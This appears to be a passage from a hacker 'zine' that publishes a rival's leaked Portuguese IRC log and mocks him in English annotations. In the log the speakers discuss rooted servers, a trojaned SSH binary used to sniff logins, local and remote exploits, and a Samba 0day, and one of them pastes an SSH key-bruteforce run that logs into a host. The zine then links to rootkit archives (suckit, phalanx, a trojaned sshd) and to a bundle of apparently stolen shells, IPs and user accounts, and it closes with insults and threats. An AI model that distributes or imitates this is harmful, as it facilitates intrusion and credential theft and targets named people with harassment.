<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q paga pau pra vc
-> PRIVMSG skotch :nao vou fazer isso denovo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q aceita tudo q vc fala
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :nao falei q tu paga sapo pra mim
-> PRIVMSG skotch :tu tb
-> PRIVMSG skotch :eh cheio das noia q nem eu
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :tu soh mostro q n confia
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :axando q eu passo maq pra xscholler
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :aff
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu some
-> PRIVMSG skotch :so joguei um verde
-> PRIVMSG skotch :se nao confiasse
-> PRIVMSG skotch :tu nao tinha
-> PRIVMSG skotch :tds minhas box
-> PRIVMSG skotch :TODAS
-> PRIVMSG skotch :fdp
-> PRIVMSG skotch :outra coisa
-> PRIVMSG skotch :descobri
-> PRIVMSG skotch :o klux
-> PRIVMSG skotch :tem root na importec                    ->>>>>> klux has root in importec[their box] (you are right sir!)
-> PRIVMSG skotch :NAO USA MAIS ELA DE PONTE               ->>>>>> dont use it as bounce anymore! (kinda late)
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
-> PRIVMSG skotch :e varias box.. ele so troca o ssh binario
-> PRIVMSG skotch :pra sniffa
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n to usando mais importec faz tempo
-> PRIVMSG skotch :fica ligeiro
-> PRIVMSG skotch :eu formatei ele
-> PRIVMSG skotch :deproposito
-> PRIVMSG skotch :ele veio no meu pvt
-> PRIVMSG skotch :colo uma pa de merda
-> PRIVMSG skotch :ele sabe da ig
-> PRIVMSG skotch :da locaweb
-> PRIVMSG skotch :da pop
-> PRIVMSG skotch :<skotch> n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
-> PRIVMSG skotch :e vice versa
-> PRIVMSG skotch :q seja
-> PRIVMSG skotch :ouytra coisa
-> PRIVMSG skotch :peguei coisa quente
-> PRIVMSG skotch :sshd 
-> PRIVMSG skotch :hehehe
-> PRIVMSG skotch :remote expl
-> PRIVMSG skotch :openbsd local                      ->>>>>>>>>> y0y0 juz g0t a openbsd local (right, check it on milw0rm, asshole)
-> PRIVMSG skotch :tu fica de putaria
-> PRIVMSG skotch :agente perdendo tempo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :o openbsd vc a mando faz tempo
-> PRIVMSG skotch :mas esse novo nao
-> PRIVMSG skotch :entra na merda do msn
-> PRIVMSG skotch :e para de putaria
-> PRIVMSG skotch :por besteira
-> PRIVMSG skotch :vou te desblokear                  ->>>>>>>>> i'll unblock ya from msn babe! plz come back !
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :to indo pro trampo
-> PRIVMSG skotch :vai para com a putaria de merda ?
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :quem fica de putaria eh vc, falando bosta sem saber de nada
-> PRIVMSG skotch : * 
-> PRIVMSG skotch : * eXstacy ~ # gcc sshexploit.c -o sshex -lssh
-> PRIVMSG skotch : * eXstacy ~ # ./sshex -h laggy.org -l xxxxx -d keys/             ->>>>>>> w0w, this is certainly a 0day, right ? /me rolling on the floor laughing
-> PRIVMSG skotch : * [!] KEY FOUND!
-> PRIVMSG skotch : * [!] Logging in...
-> PRIVMSG skotch : * Last login: Fri Aug 15 16:05:43 2008 from xxxxxxxxxxxxxxxxx
-> PRIVMSG skotch : * xxxxx@digitaljunk ~ $  
-> PRIVMSG skotch : *
-> PRIVMSG skotch : * Not that practical since it doesnt use threads, but the code shows 
-> PRIVMSG skotch : * howto make a ssh client from scratch using libssh for what purpose 
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :procura se informar primeiro antes de falar merda
-> PRIVMSG skotch :so joguei verde
-> PRIVMSG skotch :sou noiado
-> PRIVMSG skotch :vc tb he
-> PRIVMSG skotch :normal
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :esse ai eh um bruteforce q usa um bug do ssh
-> PRIVMSG skotch :nao fiz mal nenhum pra vc
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pode demorar horas pra achar a key certa
-> PRIVMSG skotch :nao
-> PRIVMSG skotch :de 5 a 10 min
-> PRIVMSG skotch :o coideloko ja ta melhorando ele
-> PRIVMSG skotch :pra demorar menos
-> PRIVMSG skotch :hehe
-> PRIVMSG skotch :a oi ta bugada
-> PRIVMSG skotch :ele FUNCIONA
-> PRIVMSG skotch :e jaja
-> PRIVMSG skotch :to com 0day pra samba
-> PRIVMSG skotch :aguarde
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :so falo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pra vc fica esperto
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q tem gringo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :te sniffando
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pq fikei sabendo
-> PRIVMSG skotch :ta loko ?
-> PRIVMSG skotch :so se for na bnc
-> PRIVMSG skotch :hehehe
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :nego q ta falando com vc
-> PRIVMSG skotch :ateh entao nao ligo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :soh pra causar intriga
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu eh meu amigo ou nao eh :?
-> PRIVMSG skotch :<skotch> so falo
-> PRIVMSG skotch :<skotch> pra vc fica esperto
-> PRIVMSG skotch :<skotch> q tem gringo
-> PRIVMSG skotch :<skotch> te sniffando
-> PRIVMSG skotch :<skotch> pq fikei sabendo
-> PRIVMSG skotch :qm sniffando ?
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :fala krl
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :skotch
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :to comend mermao
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e to atrasado pro trampo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :flw
-> PRIVMSG skotch :cara
-> PRIVMSG skotch :se tu continuar folgado
-> PRIVMSG skotch :naovaidar
-> PRIVMSG skotch :vai sew fude
-> PRIVMSG skotch :fala direito
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :isso eh facil de vc descobrir, so vc ver quem se aproximo de vc
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :ultimamente
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e n trocava ideia antes
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :so vc pensar
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :vc
-> PRIVMSG skotch :e o thomaz
-> PRIVMSG skotch :sao os unicos
-> PRIVMSG skotch :q tem as m erda q tenho
-> PRIVMSG skotch :UNICOS
-> PRIVMSG skotch :mais ngm tem
-> PRIVMSG skotch :nao confio em m ais NGM
-> PRIVMSG skotch :eu acho q tu deveria me falar qm eh
-> PRIVMSG skotch :so isso
-> PRIVMSG skotch :e troquei de bnc ontemrs
-> PRIVMSG skotch :e troquei de bnc ontem rs                         ->>>>>> i changed my bnc yesterday! (we're glad)
-> PRIVMSG rip :skotch said to me that are sniffing me
-> PRIVMSG rip :but skotch dont know about nothing                   ->>>>>> as always, backstabbing hiZ boyfriend(skotch)


/*
 * Geminid IIb. TCP/UDP/ICMP Packet flooder
 *
 * What can i say? Enjoy! :)
 * gr33tz: PoWerPr0 and godmode0
 *

thanks for the gem source by the way!

>>> there could be more logs, but some kool guyz cant stop ddosing r47, so this is kind of boring to do
>> anyway, if we get something else in the future, we will publish again. thanks buddies.
> random logs if you have nothing to do: http://labsec.elite.vc/r47-1.log http://labsec.elite.vc/r47-2.log

##########################################################################
#       __                 __                __   __                     #
#.----.|  |--.---.-.-----.|  |_.-----.----. |  |_|  |--.----.-----.-----.#
#|  __||     |  _  |  _  ||   _|  -__|   _| |   _|     |   _|  -__|  -__|#
#|____||__|__|___._|   __||____|_____|__|   |____|__|__|__| |_____|_____|#
#                  |__|                                                  #
#                                                                        #
# - download links                                                       #
##########################################################################

<><> thiZ iZ ZeRIouZ buZInEzZ dewD!
<><> http://labsec.elite.vc/x0x0x-suckY-sshd.tar.bz2
<><> http://labsec.elite.vc/x0x0x-suckY-phalanx-suckit.tar.bz2
<><> http://labsec.elite.vc/x0x0x-suckY-shells-ips-users-allinone.tar.bz2 [we are not sharing all of them, just some random ones]

<><> please guyZ, make it priv8 ! (/me rolleyes :B)

- kool&klean chapter.

##########################################################################
#              _               _              ___                        #
#         ___ | |_  ___  ___ _| |_ ___  _ _  | | '___  _ _  _ _          #
#        / | '| . |<_> || . \ | | / ._>| '_> | |-/ . \| | || '_>         #
#        \_|_.|_|_|<___||  _/ |_| \___.|_|   |_| \___/`___||_|           #
#                       |_|                                              #
#                                                                        #
# - conclusion                                                           #
##########################################################################


----------------- reflection time
>.......... whats the point of all this ? prove that you are better than someone ?
>......... what a joke. just coz you are lucky and had the chance it doesnt mean you are bl4ckh47.
>........ your zines are pathetic. what the fuck is this 'messages' shit in the bottom of them ?
>....... like you are able to hack someone by yourself, eh ? you cant do shit x0x0x, you ARE shit.
>...... why thank soldiers and all blackhats? you dont belong to any of them, none of them like you.
>..... why would someone send you a mail? nobody cares about you, dipshit.
>.... i cant really believe that you spent time creating a new mail just koz of your second shit zine, hahahahaha what a joke
>... stop playing hacker, you are not hacker, - we are not hackers -, you cant even do shellscript, get a life while you can.
>.. a kiss to zmda
>. think twice before you fuck with us, asshole. we know you, we know what you can do, and we know what you cant do.
> just to finish:

******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************
;
;
; _____          __     _______             
;|     |_.---.-.|  |--.|     __|.-----.----.
;|       |  _  ||  _  ||__     ||  -__|  __|
;|_______|___._||_____||_______||_____|____|
;                                           
; _______           __               __         __              
;|_     _|.-----.--|  |.--.--.-----.|  |_.----.|__|.-----.-----.
; _|   |_ |     |  _  ||  |  |__ --||   _|   _||  ||  -__|__ --|
;|_______||__|__|_____||_____|_____||____|__|  |__||_____|_____|
;                                                               ;
;
; #LABSEC @ EFNET - closed to friends, of course.
;
; klux/djow - include - input - r3n4t0 - memelo - deadcow - w3b - kernel` - kylebond - fseek
;
; lAmE ZiNE wRitTeN bY:
;
; klux - spoof1 @RR0B@ gmail.com - hAppY flOodiNg
;
;
; wE iZ watCHiNg U
******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ********************************